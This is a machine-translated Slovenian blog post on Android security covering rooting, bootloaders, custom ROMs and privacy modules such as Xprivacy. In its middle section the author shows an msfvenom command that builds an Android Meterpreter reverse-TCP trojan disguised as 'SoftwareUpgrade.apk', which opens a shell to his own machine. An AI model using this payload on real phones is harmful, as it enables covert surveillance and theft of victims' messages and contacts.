Vir slike: pixabay.com

Uvod v Android

V tej temi bomo spoznali Android in Open Source Security (OS). Android je odprtokodna platforma. Podobno je kot Linux, vendar se vseeno preveč razlikuje od Linuxa. Linux je v primerjavi z Androidom preveč zrel. Torej, to je Chetan Nayak in dobrodošli na mojem naslednjem blogu o odprtokodni spletni varnosti. Ta blog sem napisal ob predpostavki, da bi večina od nas uporabljala Android K, torej Kitkat ali Android L, tj. Lollipop.

Razlog, da sta Gingerbread in Jellybean, je imel veliko odprtokodnih varnostnih vprašanj, o katerih ne morem razpravljati v tem samem blogu. Torej, morda bom o tem razpravljal naslednjič, ko se bom podrobneje zadrževal v starejših različicah Androida. Tako se od zdaj naprej držimo KitKat in Lollipopa.

Android je bil zasnovan z mislijo razvijalcev. Varnostni nadzor je bil zasnovan tako, da zmanjša breme razvijalcev. Varnostni razvijalci lahko brez težav sodelujejo in se zanašajo na prožen varnostni nadzor. Razvijalci, ki manj poznajo varnost, bodo zaščiteni z varnimi privzetki.

Začetek

V android me ni bilo veliko do poznega četrtletja 2013, ko sem imel svoj prvi mobilni telefon Android, ki je bil Sony Xperia L (na osnovi 4.2.2 od takrat). K vragu, celo sovražil sem android, zato, ker je bil zelo lagan, še posebej Samsung naprave. Takrat sem že razmišljal o nakupu sistema Windows Lumia, a na srečo sem včasih igral veliko iger in sem moral kupiti Xperia L, saj je bila ta celica Lag Proof. Imel je približno 1 gig RAM-a in Adreno 305. Dovolj kul, da lahko karkoli zaženem.

Po igranju številnih iger, kot sta NOVA3 in ModernCombat4, sem se v enem mesecu dolgočasil v tej celici. Vedel sem, da Android temelji na Linuxu, in na tem sem hotel narediti nekaj svojih sprememb. Začel sem brati o Prilagoditvah in se naučil o tem, kar se imenuje "Ukoreninjenje". Ker sem imel dober backhand v Linuxu, mi koreninjenje ni predstavljalo težav. Z malo pomoči XDA mi je uspelo uspešno izkoreniniti celico.

Ampak potem me je nekaj prizadelo. Takoj, ko se je moja celica po vkoreninjenju ponovno zagnala, se je ravno začelo zagonsko zanko (za vedno se je zataknilo na zagonskem zaslonu). Sploh nisem vedel, kakšen bootloader je v androidu. Torej, ničesar nisem mogel storiti. Samo en mesec, ko sem kupil svojo novo celico, je bila moja mehka opeka. Vedno berem koreninjenje je nevarno, a nisem vedel, da bo to opeklo mojo celico. Vendar sem se motil. Ko sem nenehno bral ene in druge stvari o ukoreninjenju, sem spoznal, da zakoreninjenje ne opeče vašega telefona.

Ukoreninjenje je podobno kot Admin Access v računalniku (pravzaprav gre za sistemski dostop, vendar sem napisal Admin Access, zato ga je za noobe enostavno razumeti.) To pomeni, da vam bo korenina nikoli ne opekla telefona. Prav zagonski nakladalec mi je opeval telefon. Za ljudi, ki ne vedo, je zagonski program; bootloader je podoben BIOS-u v operacijskem sistemu Windows. (Če ne veste, kaj je BIOS, potem sploh ne bi smeli brati razmišljanja o varnosti.) Bootloader ali Hboot (tako se imenuje android) je prva stvar, ki se zažene, ko zaženete Android napravo.

Paket vsebuje navodila za zagon jedra operacijskega sistema in večina jih je posebej zasnovanih za izvajanje lastnega okolja za odpravljanje napak ali sprememb.

Varnostna kontrolna točka Android

Pomislite, da je zagonski program kot varnostna kontrolna točka vaše naprave. Če prekinete to kontrolno točko, boste izgubili vse, kar imate na telefonu. Torej, to je dobra zaščitna funkcija. Ker če izgubite telefon in nekdo poskuša pridobiti korenski dostop, da zaobide ključavnico (ob predpostavki, da ste napravo zaklenili s pinom ali geslom.), Bo moral obvezno odkleniti zagonski nalagalec, kar bo povzročilo izbris vaših podatkov po telefonu.

Torej, ni vam treba skrbeti, da bi ga kdo zlorabil. Podobno je tudi z ROMS-ji po meri. ROM-ovi so operacijski sistemi, ki temeljijo na različicah Android, posebej zasnovanih za vašo strojno arhitekturo. Če torej v telefonu preverite XDA, boste imeli za svoje telefone n število prilagojenih ROM-ov, nekateri najbolj znani so Cyanogen Mod ROM, ki so že vkoreninjeni in imajo vnaprej določen niz prilagoditev. .

Varnostni overRide Android

Od zdaj morda razmišljate, da imate varen mobilni telefon. Ampak tu sem, da znova dokažem, da ste se zmotili in v tem je vse poanta tega bloga. V drugem četrtletju 2014 so ljudje že začeli razvijati izkoriščanja in rootkite za Android, ki bi lahko izkoreninili vaše mobilne telefone, ne da bi odklopili zagonske nalaganje.

Ni dovolj strašljivo? Naj povem najnevarnejši del. V notranjost so lahko celo namestili Trojane. Tudi če bi policisti lahko izsledili celico in jo celo dobili nazaj, še vedno obstaja veliko tveganje, da bi na telefonu videli vse, kar počnete. To je nekaj, kar sem poskusil kot poskus v dejanskem praktičnem okolju.

Za ta napad sem uporabil Metasploit. Kar sem storil, sem ustvaril Trojan in ga namestil v ciljni telefon. Bila je preprosta apk datoteka in poimenoval sem jo Software Upgrade. Torej, če je uporabnik samo navaden človek, ki ima le nekaj bitnih in bajt informacij o varnosti, potem si ga niti ne bo upal odstraniti. In prepričal sem se, da se bo zlonamerna programska oprema, ko sem aktiviral internet, samodejno izvedla in se povezala nazaj na svoja oddaljena vrata na gostiteljskem računalniku.

Za napad so bili uporabljeni naslednji ukazi (Metasploit je programska oprema za testiranje penetracije, ki pomaga pri preverjanju ranljivosti na platformi ali določenih napravah.)

IP naslov mojega gostitelja: 192.168.xx.xx

Moja vrata gostitelja (za povezavo nazaj): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Torej, tukaj sem ustvaril povratni TCP kanal v svojem računalniku. Torej, vsakič, ko se internet začne na androidu, se mi odpre lupina na mojem Kali-jevem stroju ali na napravi, v katero sem namestil Metasploit.

Zdaj veste, kako strašljivo je za osebo, ki je sploh ne poznate, ima zapise o vsaki transakciji, ki jo opravljate prek svoje celice, vsakega drugega stika, WhatsApp sporočila, SMS, Viber in Skype dnevnik klicev in vse. Če to ni grozno, potem ne vem, kaj je.

Priporočeni tečaji

  • Certifikacijski tečaj v Ruby Debugging
  • Izpolnite tečaj PHP MySQL
  • Spletni tečaj certificiranja v programiranju VB.NET
  • Spletni tečaj fundacije ITIL

Pokritje

Dovolj o varnostnih težavah. Vsi vemo, da ima vsaka druga platforma težave z varnostjo. Kako smo lahko bili potem varni? To ni povsem res. Platforme je mogoče varno določiti do določene točke, a po tem je na nas, da poskrbimo, da bo tako ostalo. V svetu varnosti obstaja zloglasni citat:

"Socialni inženiring: Ker ni obliža za človeško neumnost"

To besedno zvezo sem slišal že dolgo nazaj, ko sem gledal konferenco DefCon.

Kadar ni nobene tehnične ranljivosti, ki bi jo bilo mogoče izkoristiti, bi morali poskusiti vdreti ljudi. In s tem ne mislim na hipnotizem in podobne stvari. Mislim na socialni inženiring. Za več informacij o tem lahko preberete moj drugi blog "Pomen kibernetske varnosti v našem vsakodnevnem življenju".

Glavna varnostna funkcija Androida

Poleg tega socialni inženiring, za kar je mogoče poskrbeti le, če si pameten; obstajajo načini, kako lahko razvijte aplikacije za Android na varen način in se tako prepričate.

Tukaj je nekaj glavnih varnostnih funkcij, ki vam pomagajo sestaviti varne aplikacije:

  • Sandbox aplikacij za Android, ki izolira podatke vaše aplikacije in izvajanje kode od drugih aplikacij.
  • Aplikacijski okvir z robustnimi izvedbami skupnih varnostnih funkcij, kot so kriptografija, dovoljenja in varen IPC.
  • Šifriran datotečni sistem, ki ga je mogoče omogočiti za zaščito podatkov na izgubljenih ali ukradenih napravah.
  • Uporabniška dovoljenja za omejitev dostopa do funkcij sistema in uporabniških podatkov.
  • Dovoljenja, določena s programom, za nadzor nad aplikacijami na aplikacijo.

Kaj lahko storite, če želite varno okolje, vendar niste razvijalec?

Tako kot pri Androidu 5, tj. Lollipopu, ponuja funkcijo, kjer lahko uporabnik doda več profilov in omejen način uporabe telefonov in tabličnih računalnikov. Če ste vkoreninili telefon, obstajajo androidne aplikacije v modulih Xposed, kot so AppOps, Xprivacy ali Privacy Guard, ki vam pomagajo skrbeti za skoraj vse. Za to morate namestiti Xposed Framework.

Xposed Framework je tisto, kar omogoča delo Xposed modulov. Xposed moduli vam omogočajo, da spremenite vedenje Apk datotek in sistemskih datotek brez potrebe po namestitvi drugega ROM-a. Spremembe je prav tako enostavno razveljaviti, tako da je tu malo ogroženih in to sploh ni zamudno, saj ni treba utripati več ROM-ov, jeder in njihovih popravkov napak.

Xprivacy, Privacy Guard in AppOps so izpostavljeni moduli, ki vam omogočajo, da vaš Android postane varen, tako da izberete, katera aplikacija bi morala imeti dostop do tega, kot so internet, tipkovnica, sdcard, root dostop in številne druge stvari. Lahko celo onemogočite dostop samo do določenih storitev in ustvarite za to določene uporabniške predloge. Kar se mene tiče, raje izberem Xprivacy. Tu pa je nekaj informacij ali razlik, če prosite, da se odločite za zgornje tri.

AppOps:

To je prvotno predstavil Google v Android 4.3. (To je glavni razlog, da ga ne podpiram. Ne zaupam Googlu. Poimenujte ga Paranoia, toda google sledi vsem, kar počnete. In ne potrebujem nekoga, ki bi spremljal vse, kar počnem, če pa zaupate Googlu, pojdi.). Glavna omejitev AppOps-a je, da Google dovoljuje samo blokiranje dostopa do tistih aplikacij, ki jih želite blokirati.

To pomeni, da če želite blokirati aplikacije, povezane z Googlom, na primer storitve Play (ki dejansko porabijo več kot 50% vašega običajnega pomnilnika, baterije in podatkov (internet)), ne boste mogli. To je še en razlog, da sovražim Google. Zato verjamem, da AppOps zame ni nič drugega kot zlonamerna programska oprema. (ampak to mislim samo jaz, vendar ne, če samo srčno zaupate Googlu)

Zaščita zasebnosti:

Zaščita zasebnosti je preprost za uporabo vmesnik, ki ga je Cyanogen Mod zamenjal za AppOps. Če ste začetnik, vam predlagam, da to uporabite, saj ima le gumb za vklop in izklop in samo-definirane predloge, do katere vrste aplikacij bi moral biti dostopen. To ni tako varno, če obstaja zlonamerna programska oprema, ki deluje ali se lažno predstavlja kot sistemska aplikacija. Vendar je dobro, da začnete.

Xprivacy:

Xprivacy je orodje vse v enem. A je namenjen strokovnjakom. Lahko ga primerjate z nožem švicarske vojske. Vse ima v sebi in vaš telefon lahko na vse druge načine zavaruje, toda če ne veste, kaj počnete, bo vaš telefon samo zmedel in ustavil aplikacije, da se sploh ne zaženejo. Prav tako lahko omejite dostop do sistemskih aplikacij. Ta je osebno najraje izbran.

Poleg zgornjih modulov obstajajo še drugi moduli, kot sta Lightening Firewall ali BootManager v Xposed, ki lahko pomagajo omejiti dostop do interneta za določene aplikacije in preprečijo zagon programov ob sistemu ob ponovnem zagonu telefona.

Torej, to bi bilo to za ta blog. V primeru varnosti lahko zagotovo obiščete ali ste član spletnega mesta XDA, ki vam lahko zagotovi veliko več informacij o zasebnosti.

Priporočeni članki: -

To je vodnik za Android. Tu smo razpravljali o osnovnem konceptu, varnostnih kontrolnih točkah in glavni varnostni funkciji Androida. Če želite izvedeti več, lahko preberete tudi druge naše predlagane članke -

  1. Android Intervju Vprašanja - Top 10 koristnih vprašanj
  2. 8 uporabnih alternativ Siri za Android
  3. 28 najboljših nasvetov za orodja za razvoj aplikacij za Android
  4. Kariera v razvoju Android

Kategorija:

Razvoj programske opreme